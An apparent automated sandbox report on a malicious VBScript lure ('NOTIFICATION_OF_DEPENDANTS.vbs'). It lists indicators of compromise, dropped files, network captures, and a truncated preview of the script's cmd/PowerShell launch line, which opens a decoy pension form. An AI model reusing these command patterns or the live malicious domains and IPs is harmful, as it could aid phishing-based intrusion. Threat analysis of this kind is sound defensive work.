	https://fm.blebsions.com/R7tS/	Get hash	malicious	Unknown	Browse
	https://share.hsforms.com/1IRrYqkWKQoiBbzgMszUPYQsxda8	Get hash	malicious	Unknown	Browse
45.125.67.168	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse
	TD2HjoogPx.dll	Get hash	malicious	Unknown	Browse
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
d12y248af9ueom.cloudfront.net	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	108.158.75.80
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	108.158.75.92
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	108.158.75.92
	https://ury.io/aVPeBa	Get hash	malicious	Unknown	Browse	52.222.214.74
kiltone.top	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	45.125.67.168
	TD2HjoogPx.dll	Get hash	malicious	Unknown	Browse	45.125.67.168
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	45.125.67.168

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MIT-GATEWAYSUS	https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exe	Get hash	malicious	Unknown	Browse	18.66.153.159
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	19.29.166.20
	zapret.exe	Get hash	malicious	Unknown	Browse	18.66.161.26
	http://93287.mobi	Get hash	malicious	Unknown	Browse	18.165.220.52
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	19.122.130.89
	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse	18.165.220.57
	https://em.navan.com/MDM3LUlLWi04NzEAAAGXecU3IyvXka_yOfm1UXs3oOmq7mq-S6uBgGscrsY0kWMgpLalbadmEIYbTEXYqyKQHEXyRQM=	Get hash	malicious	Unknown	Browse	18.66.161.14
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	18.67.71.46
	la.bot.arm6.elf	Get hash	malicious	Mirai	Browse	19.156.197.86
	2.elf	Get hash	malicious	Unknown	Browse	19.32.199.151
TELE-ASTeleAsiaLimitedHK	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	45.125.67.168
	TD2HjoogPx.dll	Get hash	malicious	Unknown	Browse	45.125.67.168
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	45.125.67.168
	R7bv9d6gTH.dll	Get hash	malicious	Unknown	Browse	103.253.43.248
	http://9089357365.com/	Get hash	malicious	Phisher	Browse	45.125.65.213
	UBONg7lmVR.exe	Get hash	malicious	Unknown	Browse	45.125.66.18
	UBONg7lmVR.exe	Get hash	malicious	Unknown	Browse	45.125.66.18
	1feP5qTCl0.exe	Get hash	malicious	Unknown	Browse	45.125.66.18
	V6ZsDcgx4N.exe	Get hash	malicious	Unknown	Browse	45.125.66.18
	V6ZsDcgx4N.exe	Get hash	malicious	Unknown	Browse	45.125.66.18

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Brooming.vbs	Get hash	malicious	Remcos, GuLoader	Browse	45.125.67.168
	TT copy.js	Get hash	malicious	FormBook	Browse	45.125.67.168
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS	Browse	45.125.67.168
	Rapporteer inbreuk op auteursrechten.lnk.d.lnk	Get hash	malicious	Unknown	Browse	45.125.67.168
	File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk	Get hash	malicious	Unknown	Browse	45.125.67.168
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	45.125.67.168
	alyemenione.lnk	Get hash	malicious	Havoc, Quasar	Browse	45.125.67.168
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	45.125.67.168
	Payment_Failure_Notice_Office365_sdf_[13019].html	Get hash	malicious	HTMLPhisher	Browse	45.125.67.168
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	45.125.67.168

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\fjeljies.cpl	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\fjeljies.cpl	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.5172095868522671
Encrypted:	false
SSDEEP:	3072:cJhXC9lHmutpJyiRDeJ/aUKrDgnmx5Lp94:5RfLp94
MD5:	EFF5F466D470F6EF7D811DB87973972C
SHA1:	B258E7559F4D9AACE8036F857E437486DB3879E9
SHA-256:	44171B296A939BF78673275AFD068A94CB5048E84C4D50BE70660DFD86D1A567
SHA-512:	F85DAED568432AB2CC275E3C9EAD5D669ADE112C6117886A6BE7608F01934713638AEF720153C958027272D8697B6508673F644C96E9E4EC63FEA3AB43F3C4A4
Malicious:	false
Preview:	^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllulfp:NllUf
MD5:	0FC4FB02A36BD59474720830F64433BA
SHA1:	2C635E8F4241E9CB0E464C10E0E101DCC5923F44
SHA-256:	AA5847807809D4B8457937617D9F7CE6F70ACF90D26C3A03C2B502E4B9E937D9
SHA-512:	995184FFA68FAC0AEE914908F647961B35C05E4176633FB1840E7A9EB73CE93CEAE6563343BB569D2CEF8C93C637F802051027D8F37BC0FCE105342D2D99FCD4
Malicious:	false
Preview:	@...e.................................:..............@..........

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 05:52:26 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.980741445370966
Encrypted:	false
SSDEEP:	48:8RdBTcwHNidAKZdA1P4ehwiZUklqeh0y+3:8FomOry
MD5:	8E788DE0A2291FD1B4045D5A85D749A0
SHA1:	BE5C19CBD51D0FCCE5D26565BEBE0757E9C6054C
SHA-256:	0F1574D9E105593DD9DDC09CC60608990829EAF103C82812B2DC0AA6BF8DA233
SHA-512:	630C31E8B22850446A0885C480EACEF3DAB9A50D3301022E563E08EAA6E149BA4BDD0D37CEC14BE969172A1DAD20EDCD9FD51FFA6231AA576FBAF012027409C0
Malicious:	false
Preview:	L..................F.@.. ...$+.,........Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.6....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.6....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.6....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.6.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.6...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Process:	C:\Windows\System32\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.305255793112395
Encrypted:	false
SSDEEP:	3:8yzGc7C1RREal:nzGtRV
MD5:	6ED2062D4FB53D847335AE403B23BE62
SHA1:	C3030ED2C3090594869691199F46BE7A9A12E035
SHA-256:	43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
SHA-512:	C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
Malicious:	false
Preview:	ERROR:...Description = Initialization failure...

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	283
Entropy (8bit):	4.84674468132717
Encrypted:	false
SSDEEP:	6:PzXULmWxHLTpUrUDOwUsW3CNcwAFeMmvVOIHJFxMVlmJHaVFlr1Ilr80yn:P+pTpcUqnsTDAFSkIrxMVlmJHaVv1UZy
MD5:	0C5350B252EEAAC53344AD1EA0C3CB21
SHA1:	B7AF4076D8916706D8370FBA3902D14610ABABB7
SHA-256:	B49600A2FAE3809A53FE0D2313053405295B7AC71ED45885FB8AB6D47BBA991B
SHA-512:	D404762DFAB7008F43B0B4DD0430C8C866B29CE5C867489EFB94C48165B4F189B1C048154DC1895158200976FC0F8FAABB25C035C701F4334F6D5BC3997E2663
Malicious:	false
Preview:	..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=138ms TTL=55....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 138ms, Maximum = 138ms, Average = 138ms..

File type:	ASCII text
Entropy (8bit):	5.2881261282545475
TrID:
File name:	NOTIFICATION_OF_DEPENDANTS.vbs
File size:	1'009 bytes
MD5:	78d392dbb4dacec38ea4f6efaeb62797
SHA1:	f2766170575b017fe801c4c98d58dfa1baf0818b
SHA256:	8dfebd7977251503d34f06b75d8b76a518c6f07ef52e3724aed9c3d9158a662e
SHA512:	3b3125cf9470e130823e6b73993901c78270b2e321c6fb04fa4253fbb5f5193f267ef9739abf9327ec56259a91950fa19e91fcee3cdad630d3455d45f9ca4cc7
SSDEEP:	24:EDv3D5nX10YJnELUPDVKOpiFMpwkyVlK/u9ospkvyEFUC:8z5nl0YJE4hpgM+S/r7v7
TLSH:	26111023F2FC032E27EE82B0D1B517F86E93DB020D6461674B34FD4552482A9C3B668D
File Content Preview:	' Define the command to execute .Dim command, command1, command3, tempFolder, exclusionCommand.command = "cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Bene

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 07:52:25.173783064 CET	59928	53	192.168.2.9	1.1.1.1
Dec 19, 2024 07:52:25.174007893 CET	53407	53	192.168.2.9	1.1.1.1
Dec 19, 2024 07:52:25.312324047 CET	53	60756	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:25.314878941 CET	53	58426	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:26.188719034 CET	50432	53	192.168.2.9	1.1.1.1
Dec 19, 2024 07:52:26.198293924 CET	51773	53	192.168.2.9	1.1.1.1
Dec 19, 2024 07:52:26.198847055 CET	57428	53	192.168.2.9	1.1.1.1
Dec 19, 2024 07:52:26.296144962 CET	53	59928	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:26.339382887 CET	53	51773	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:26.474509001 CET	53	53407	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:26.474695921 CET	53	57428	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:26.596384048 CET	53	50432	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:28.324136019 CET	53	57253	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:28.693464041 CET	63712	53	192.168.2.9	1.1.1.1
Dec 19, 2024 07:52:28.693583965 CET	51185	53	192.168.2.9	1.1.1.1
Dec 19, 2024 07:52:28.832722902 CET	53	63712	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:28.833085060 CET	53	51185	1.1.1.1	192.168.2.9
Dec 19, 2024 07:52:45.459475994 CET	53	58223	1.1.1.1	192.168.2.9
Dec 19, 2024 07:53:03.046288967 CET	138	138	192.168.2.9	192.168.2.255
Dec 19, 2024 07:53:04.433284998 CET	53	53943	1.1.1.1	192.168.2.9
Dec 19, 2024 07:53:24.300299883 CET	53	57143	1.1.1.1	192.168.2.9
Dec 19, 2024 07:53:27.475104094 CET	53	63052	1.1.1.1	192.168.2.9
Dec 19, 2024 07:53:58.159589052 CET	53	53496	1.1.1.1	192.168.2.9

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 19, 2024 07:52:26.339456081 CET	192.168.2.9	1.1.1.1	c259	(Port unreachable)	Destination Unreachable
Dec 19, 2024 07:53:29.834866047 CET	192.168.2.9	1.1.1.1	4d5a		Echo
Dec 19, 2024 07:53:29.973234892 CET	1.1.1.1	192.168.2.9	555a		Echo Reply
Dec 19, 2024 07:53:42.954849005 CET	192.168.2.9	1.1.1.1	4d59		Echo
Dec 19, 2024 07:53:43.093265057 CET	1.1.1.1	192.168.2.9	5559		Echo Reply
Dec 19, 2024 07:53:48.479067087 CET	192.168.2.9	1.1.1.1	4d58		Echo
Dec 19, 2024 07:53:48.617376089 CET	1.1.1.1	192.168.2.9	5558		Echo Reply

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:52:28 UTC	778	OUT	GET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1 Host: www.oldmutual.co.za Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 06:52:29 UTC	1048	IN	HTTP/1.1 200 OK Content-Type: application/pdf Content-Length: 313058 Connection: close Content-Disposition: inline; filename=Superfund_Beneficiary_Nomination_form.pdf Fastly-Io-Error: not a supported image format Fastly-Io-Served-By: vpop-etou8240196 Fastly-Stats: io=1 Server: contentstack X-Contentstack-Organization: blt2c31cdce6d24f06c X-Request-Id: 3dd79f5f402ab71f92243ac6017a1eed X-Runtime: 97ms Via: 1.1 varnish, 1.1 varnish, 1.1 8e3bfda7f79eae3b0adf702cec19c81e.cloudfront.net (CloudFront) Cache-Control: max-age=31536000 Accept-Ranges: bytes Date: Thu, 19 Dec 2024 06:52:28 GMT X-Served-By: cache-ams21052-AMS, cache-fjr990025-FJR X-Cache-Hits: 4, 0 X-Timer: S1734591149.900478,VS0,VE1 Access-Control-Expose-Headers: content-disposition, content-type, cache-control, status, content-length Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31557600 Vary: Accept-Encoding X-Cache: Miss from cloudfront X-Amz-Cf-Pop: DXB52-P1 X-Amz-Cf-Id: xM7dalgq4kGVNV_N0i6tdEmgNyhecqQSul-8vbaOccEgLgc5pAGVUQ==
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 31 39 36 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 34 31 38 2f 4c 65 6e 67 74 68 20 33 36 38 31 2f 4e 20 34 36 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de cc 5a 7b 6f 1b 39 92 ff 2a 0d dc 1f 9b e0 30 62 37 9f 4d 60 11 40 b1 9d 19 df c6 76 2e 76 2e 37 d3 10 16 6d a9 6d 37 46 52 6b 5b ad 4c 7c 9f fe 7e 45 16 65 f9 19 27 13 4c 16 86 c4 57 55 b1 aa 58 2f d2 f2 b6 cc f2 cc 5b 9f 49 6d 32 6f 5c e6 a4 45 6b b3 52 62 de 60 ae c0 d8 a9 ac c8 1d 06 ae c8 0a 53 52 47 66 32 2f a8 93 67 52 5a 09 1a 98 31 04 6c 8b 4c 5a 55 a2 e3 d0 d1 0e 1d 9b 49 e7 08 46 a1 53 16 e8 00 ab 54 0a 3b f8 4c e9 02 33 a6 cc 94 75 c4 8b c9 94 93 00 76 Data Ascii: %PDF-1.6%1196 0 obj<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>streamhZ{o9*0b7M`@v.v.7mm7FRk[L\|~Ee'LWUX/[Im2o\EkRb`SRGf2/gRZ1lLZUIFST;L3uv
2024-12-19 06:52:29 UTC	6002	IN	Data Raw: 27 06 fe bc d0 63 0f 61 5d 5e 56 70 d7 b5 de 4e bb 2e 2f 2b 56 fb 86 cb cb 8a ed 9d b3 2e 2f 2b b6 17 ae ba bc ac d8 5e b8 ea d2 b2 62 fb 6d e4 fe 1a 71 50 56 cc 5f 10 7c 5a 56 22 e6 95 f3 0d 15 71 55 7c 14 d4 ba c2 0b e2 69 59 59 27 5e f3 01 7e 1a 4d 63 d7 38 34 ba c6 d0 38 35 a6 c6 d2 28 3c 13 9e 09 cf 84 67 0f 75 22 46 7c a1 6c 55 3f 6d ac 6e 1a bb c6 a1 d1 35 86 c6 a9 31 35 d6 43 09 59 4f 0b 11 9e 1b 75 9f cd cf 16 6f 4b ba 97 74 2f e9 5e d2 bd 4c 2a 98 54 30 a9 60 52 c1 f2 fc d1 b7 25 0f 97 3c 5c f2 70 c9 c3 25 0f 97 3c 5c f2 70 c9 c3 d5 0e 0c bb cd 25 3f 2f f9 79 29 6e 4b 71 5b 8a db 52 dc 96 e2 b6 14 b7 b5 8e d0 55 e5 b3 84 aa de 92 ea 2d a9 de 92 ea 2d a9 de 92 a5 6c 38 15 91 73 e8 ea 0a a9 ae 90 ea 0a a9 ae 90 29 54 f5 a2 54 2f 4a f5 a2 2c 3b 42 Data Ascii: 'ca]^VpN./+V./+^bmqPV_\|ZV"qU\|iYY'^~Mc8485(<gu"F\|lU?mn515CYOuoKt/^L*T0`R%<\p%<\p%?/y)nKq[RU--l8s)TT/J,;B
2024-12-19 06:52:29 UTC	2292	IN	Data Raw: 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 31 35 2f 4c 65 6e 67 74 68 20 33 38 30 2f 4e 20 32 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 3c d4 db 71 e5 30 0c 03 d0 56 5c 82 0d c9 b6 d4 46 7e 33 e9 bf 8d ec e4 1e ec 17 86 6f 90 a2 78 5d fb 3c ce 63 af 7d dc e7 7d 7c 8f fb fe 27 7e 1d e3 5d 1f bc e7 07 67 71 d0 07 5e 7f 38 cf 09 c5 cf c6 9f 50 dc 4b 7e 2f f8 7c f0 29 be f4 ad 43 7e f8 3f 9b bd 7e 78 3d ea 3e 95 c5 3f e5 d9 38 f2 5b ff f2 6b 7d bc 27 ff d9 7e d8 ef a5 cf 07 56 de 10 af 09 57 e8 f1 5f f2 ac da f1 5c ec 1b ff 85 c7 52 7f 8b db 78 2d b8 c5 ef e6 17 bf f5 b9 cb ef 84 f4 ab f2 5f fc cf f7 28 41 0e 51 20 88 65 57 7f 42 32 02 d9 d5 3f f0 a5 17 af a1 20 18 8d 45 c3 b1 70 79 5b 57 Data Ascii: <</Filter/FlateDecode/First 15/Length 380/N 2/Type/ObjStm>>streamh<q0V\F~3ox]<c}}\|'~]gq^8PK~/\|)C~?~x=>?8[k}'~VW_\Rx-_(AQ eWB2? Epy[W
2024-12-19 06:52:29 UTC	12339	IN	Data Raw: 01 2c 11 87 c0 32 71 08 9c 24 0e 81 15 f3 1e ba de 1c d0 9b 40 dc 43 3f 30 ef 71 5f 66 03 f9 32 87 78 9c d0 29 e2 79 e8 34 f1 3c 74 86 78 1e 3a 4b 36 2d 80 73 64 93 c0 79 b2 49 c0 25 9b 04 72 c4 49 03 5c 20 0e 81 3c 71 08 ac 12 87 40 c1 f3 2b 09 b4 e6 f9 45 e8 a2 e7 17 a1 4b 9e 5f 84 7e e8 f9 45 e8 47 9e 5f 84 7e ec f9 45 e8 b2 e7 17 a1 2b c8 f1 a1 6a 01 af 7a 33 39 0b f8 96 0f 5f 07 bc 46 49 f7 66 09 cc ae e3 35 5a e6 ac fb 90 38 6f 7b 1c 5e e6 dc c0 e2 e9 ea ae 37 bd 99 b7 e2 1d 1f d2 8a 9f f8 90 e8 1b d8 a7 4c 78 d7 87 44 78 cf 87 44 78 1f dc 99 ea 7e 1f 78 33 8f fe a1 0f 89 fe 91 0f 89 fe 53 ac 2c 13 3e f6 21 11 6e f9 90 08 3f 03 f7 70 75 bf db de cc a3 7f e2 43 a2 ff dc 87 44 ff 05 56 96 09 bf f4 21 11 7e e5 43 22 dc 31 ef 35 04 94 ca 97 d5 64 54 d6 Data Ascii: ,2q$@C?0q_f2x)y4<tx:K6-sdyI%rI\ <q@+EK_~EG_~E+jz39_FIf5Z8o{^7LxDxDx~x3S,>!n?puCDV!~C"15dT
2024-12-19 06:52:29 UTC	13710	IN	Data Raw: 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 38 37 39 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 31 35 36 2e 37 32 20 31 32 2e 38 34 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 Data Ascii: 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj879 0 obj<</BBox[0.0 0.0 156.72 12.84]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>str
2024-12-19 06:52:29 UTC	12804	IN	Data Raw: 6b 5b 46 5a db 52 2d be 2c 7e 6f 0b fc 2a 34 2f ae 41 7c d3 18 98 44 8c e6 85 a5 85 b8 71 8d 06 ed 2a 7e d5 ee 34 75 a7 d3 fa 1d 54 a9 bf 4f bd 90 52 be fe 1f 23 1e f9 14 f1 24 a2 68 36 03 2a a1 4c bb 8d 59 0b 79 04 bc 99 e6 d2 cb e4 9e 16 b9 cb 35 4f 5e 8e c4 38 22 09 89 72 45 03 69 4e 1a 87 5d b1 71 d6 56 a8 92 c5 09 6e d8 a1 66 36 fd de 6b 9b d3 69 6a f9 83 fe 3f 6a db f1 73 ec e0 1d 1a d0 6f 67 eb f1 23 a6 4c 8a b5 c2 b9 fc 6c 04 b0 86 19 4a b1 49 b0 05 5e 07 3a 9f a6 35 7a 39 b6 72 fb bc f1 9e 34 81 f7 96 90 e5 5a 65 ae 85 81 b7 f0 18 89 77 9e 1d a5 02 0f 13 15 41 1c 0e bb c3 68 7a 50 e1 f5 48 92 2a a1 aa 37 df ba f5 e6 f3 f4 95 03 d7 2e 61 3f e3 f4 7b 40 e4 ba 7e 9a 1e d0 bb 17 e1 6c 25 5e cd 0d 87 c4 f1 83 4a 79 58 90 40 00 e4 b0 8b 4a d1 67 95 da Data Ascii: k[FZR-,~o4/A\|Dq~4uTOR#$h6LYy5O^8"rEiN]qVnf6kij?jsog#LlJI^:5z9r4ZewAhzPH7.a?{@~l%^JyX@Jg
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: e0 35 c4 6f 96 43 d6 da 4f 09 93 88 eb 59 1f 2d 85 bd 73 45 7c fd 21 b8 b1 2a fc dd b1 6e 19 6c 77 9c 7a 24 5c 5e 16 6f 3d c3 33 3c 83 81 0f 9c 39 ce 98 f3 92 f3 66 76 79 f6 e9 ec 6b ae 2a d7 99 cf 0c 3f fe 24 dc f0 3f a0 78 45 b4 65 20 e6 9e cd c0 25 0d df 75 5f 77 df 74 ff 6d 79 78 72 3c 2d 8b e8 d1 30 be 02 8e 7b be e8 b9 ec 79 fb ff 0e 77 1e 17 39 1f 2d 45 6e ce 43 b1 f9 19 9e 16 f8 a7 07 38 60 16 bf 59 f4 a7 43 fb 1a e2 8f 09 4a b0 a7 b7 cd d8 1e 32 da 56 6c bf 8c 5c 62 b6 63 ef 6b 08 bd 4d a0 81 48 46 5b 00 37 39 60 b4 4d 38 3e 61 b4 cd d8 be 68 b4 ad d8 fe 55 64 ea e8 89 d4 d8 c8 e8 0c 6d a8 df b0 81 f6 8d 0e d3 ae a9 c9 99 e9 e1 54 2a 39 43 63 a9 a9 f1 e1 c1 19 ba ed d8 cc e8 54 6a 9a 56 8d 1f 9b 18 1b 9e 49 d6 1e 9b 48 4e 4e 1d 9f 3e 7c 22 34 72 Data Ascii: 5oCOY-sE\|!nlwz$\^o=3<9fvyk?$?xEe %u_wtmyxr<-0{yw9-EnC8`YCJ2Vl\bckMHF[79`M8>ahUdmT*9CcTjVIHNN>\|"4r
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 8f 6c a4 3d ce 17 1b 0f d9 23 a6 6f 7c b5 71 a0 91 47 87 37 7e d7 c8 a3 63 1b 1f 00 6f 1b f0 d2 8d 3c 4d a3 17 1a 79 d0 3f d7 b8 9e 22 a6 50 64 de ce 39 42 14 3e 27 ed 33 05 15 9c 3b 65 ab 21 5d f5 3a ee 8a 28 cf db 8a c5 4b 77 9b 48 13 59 5c 94 0b 7a 2c a6 88 a3 88 25 27 d7 e0 4e b3 dc 6c 52 51 53 09 77 25 a9 98 29 96 84 ba 5f 54 81 c4 a9 b5 5e da 62 e5 16 73 2a 98 b3 63 4a 8b 3b b3 a7 ed 98 8c e9 65 5b a8 62 11 86 32 8e 2e d4 18 a2 31 c7 11 15 9f 5d 5a 52 bd 30 54 ed 09 d5 8f f2 7e 64 de 2f da 02 ac 29 97 84 6a 29 da 2e 8c 08 94 b5 20 1a 41 34 e2 ea ae e3 38 ba a2 86 e3 48 45 8a f6 b2 e3 24 95 66 0a 58 27 10 2f 81 65 dc 2a da 8a cb ac 0a ca 2c f8 e1 28 ea 26 55 c0 94 60 97 58 aa f0 85 ac 40 09 5a ac fb 16 e0 57 71 37 b7 a8 b4 be 18 08 2d 51 16 65 50 50 Data Ascii: l=#o\|qG7~co<My?"Pd9B>'3;e!]:(KwHY\z,%'NlRQSw%)_T^bscJ;e[b2.1]ZR0T~d/)j). A48HE$fX'/e,(&U`X@ZWq7-QePP
